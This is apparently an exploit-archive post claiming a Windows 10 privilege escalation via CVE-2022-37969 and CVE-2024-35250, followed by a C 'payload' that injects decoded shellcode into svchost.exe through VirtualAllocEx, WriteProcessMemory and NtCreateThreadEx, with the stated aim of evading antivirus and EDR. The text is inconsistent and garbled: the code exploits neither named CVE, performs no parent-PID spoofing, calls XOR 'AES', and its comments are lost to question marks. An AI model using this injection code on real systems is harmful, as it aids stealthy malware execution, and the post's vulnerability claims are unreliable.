Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation

Microsoft Windows 10 Famille, specifically build 10.0.19045.5487 (corresponding to Windows Microsoft Windows 10 Famille, specifically build 10.0.19045.5487 (corresponding to Windows 10 20H2, 21H1, 21H2, or 22H2 before critical updates), is known to be vulnerable to a local privilege escalation (LPE) exploit.

This vulnerability, often associated with **CVE-2022-37969**, resides within the Windows Common Log File System (CLFS) driver. It's a memory corruption flaw that allows a low-privileged user to execute arbitrary code with SYSTEM privileges.

An attacker could leverage this to gain full control over the affected system, install programs, view/change/delete data, or create new accounts with full user rights. Exploitation typically requires local access to the machine.

Microsoft addressed this critical vulnerability in security updates released in September 2022 and subsequent months. Users on build 10.0.19045.5487 or earlier should update their systems immediately to the latest patched version to mitigate this risk.

=============================================================================================================================================
| # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (Parent PID Spoofing) Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.Microsoft.com |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default.

There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.

[+] The idea:

Parent PID Spoofing is a technique used to run a malicious process under a trusted process,

helping it avoid detection by security software. This is done by changing the parent identifier (PPID) of the new process to a PID of a trusted process (such as explorer.exe or lsass.exe).

[+] The goal:

Launching a malicious payload inside a legitimate process such as explorer.exe or svchost.exe to avoid detection by antivirus (AVs) or intrusion detection systems (EDRs).

(Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: CVE-2024-35250) .

[+] Combine Parent PID Spoofing with Shellcode to execute advanced payload

After running the process under a targeted PID, we can inject Shellcode inside it to execute malicious code directly.

1. Update the code to inject Shellcode into the new process

[+] The idea:

After creating the process under a trusted PID (e.g. explorer.exe), we will:

Reserve memory inside the process using VirtualAllocEx.

Copy Shellcode to allocated memory using WriteProcessMemory.

Execute Shellcode using CreateRemoteThread.

[+] gcc -o poc.exe poc.c -m64

[+] poc.exe



[+] PayLoad :

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <winternl.h>

// ????? NtCreateThreadEx ?????? ????? ???????
typedef NTSTATUS(WINAPI* pNtCreateThreadEx)(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN PVOID ObjectAttributes,
IN HANDLE ProcessHandle,
IN PVOID StartRoutine,
IN PVOID Argument,
IN ULONG CreateFlags,
IN ULONG ZeroBits,
IN ULONG StackSize,
IN ULONG MaximumStackSize,
IN PVOID AttributeList
);

// Shellcode ???? ?????? AES (AES-128)
unsigned char encrypted_shellcode[] = {
0x8d, 0xa3, 0x5c, 0xa7, 0xc3, 0x7f, 0x6c, 0xf2, 0x8e, 0x91, 0xad, 0x33,
0x2b, 0xfe, 0x04, 0x74, 0xd9, 0x41, 0xf5, 0x1a, 0xe4, 0x8d, 0xbc, 0xa3,
0x6f, 0xd0, 0x56, 0xbb, 0x9a, 0x2d, 0x5e, 0xf1
};

// ????? AES ???????/?? ???????
unsigned char aes_key[16] = {
0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6,
0xab, 0xf7, 0x45, 0x3e, 0x67, 0x98, 0x23, 0x10
};

// ???? ?? ????? Shellcode ???????? AES-128
void decrypt_shellcode(unsigned char* data, int data_len, unsigned char* key) {
for (int i = 0; i < data_len; i++) {
data[i] ^= key[i % 16]; // XOR ???? ????? ?? AES ??????? (??????? ???)
}
}

// ????? ?? PID ????? ?? `svchost.exe`
DWORD FindTargetProcessID(const char* processName) {
PROCESSENTRY32 pe32;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
DWORD processID = 0;

if (hSnapshot == INVALID_HANDLE_VALUE) return 0;

pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if (strcmp(pe32.szExeFile, processName) == 0) {
processID = pe32.th32ProcessID;
break;
}
} while (Process32Next(hSnapshot, &pe32));
}

CloseHandle(hSnapshot);
return processID;
}

int main() {
DWORD targetPID = FindTargetProcessID("svchost.exe");

if (targetPID == 0) {
printf("[X] ?? ??? ?????? ??? ????? svchost.exe\n");
return -1;
}

printf("[+] ???? ??? Shellcode ?? PID: %d\n", targetPID);

// ?? ????? ??? Shellcode
decrypt_shellcode(encrypted_shellcode, sizeof(encrypted_shellcode), aes_key);
printf("[+] ?? ?? ????? Shellcode ?????!\n");

// ??? ??????? ?????????
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
if (!hProcess) {
printf("[X] ??? ?? ??? ???????.\n");
return -1;
}

// ????? ????? ?? ??????? ?????????
LPVOID remoteMemory = VirtualAllocEx(hProcess, NULL, sizeof(encrypted_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!remoteMemory) {
printf("[X] ??? ?? ????? ??????? ???? svchost.exe\n");
return -1;
}

// ????? Shellcode ??????? ??????? ?? ??????? ???????
if (!WriteProcessMemory(hProcess, remoteMemory, encrypted_shellcode, sizeof(encrypted_shellcode), NULL)) {
printf("[X] ??? ?? ????? Shellcode ???? ???????.\n");
return -1;
}

// ????? NtCreateThreadEx
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
if (!hNtdll) {
printf("[X] ??? ?? ????? ntdll.dll\n");
return -1;
}

pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
if (!NtCreateThreadEx) {
printf("[X] ?? ??? ?????? ??? NtCreateThreadEx.\n");
return -1;
}

// ????? Shellcode ???????? NtCreateThreadEx
HANDLE hThread;
NTSTATUS status = NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteMemory, NULL, FALSE, 0, 0, 0, NULL);

if (status != 0) {
printf("[X] ??? ?? ????? Shellcode (NTSTATUS: 0x%x).\n", status);
return -1;
}

printf("[+] ?? ????? Shellcode ????? ???????? NtCreateThreadEx!\n");

CloseHandle(hProcess);
CloseHandle(hThread);
return 0;
}

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================